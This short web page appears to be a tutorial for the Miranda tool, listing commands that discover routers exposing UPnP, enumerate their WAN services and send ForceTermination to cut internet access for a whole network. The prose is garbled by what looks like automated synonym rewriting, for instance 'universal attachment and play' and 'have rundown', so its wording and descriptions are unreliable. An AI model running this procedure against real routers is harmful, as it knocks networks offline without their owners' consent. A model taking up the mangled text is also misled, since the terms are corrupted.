
DESCRIPTION: Miranda is a device that utilizes the UPnP(universal attachment and play) convention to specify the objective modem (assuming you observed a few switches and firewalls running the UPnP IGD convention are powerless against assault). Prior to working with Miranda you ought to have moderate information on UPnP.


  1. root@root:/pentest/specification/miranda#
  1. # ./miranda.py
  1. upnp> msearch (look for that gadget with the UPnP port open)
  1. upnp> have data 0 (this order will enlighten you different data concerning your objective – name, convention, server type, UPnP server)
  1. upnp> have get 0 (lists targets if conceivable)
  1. upnp> have rundown 0 (get full subtleties of your objective after you have specified it)
  1. upnp> have data 0 devicelist WANConnectionDevice administrations WANPPPConnection activities (this order will educate you regarding the administrations that are running on the TARGET)
  1. upnp> have send 0 WANConnectionDevice WANPPPConnection ForceTermination (end the web all oevr the organization)
  1. upnp> have send 0 WANConnectionDevice WANPPPConnection RequestConnection (re-empower web)

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The 20 Most-Used Linux Commands You Should Know

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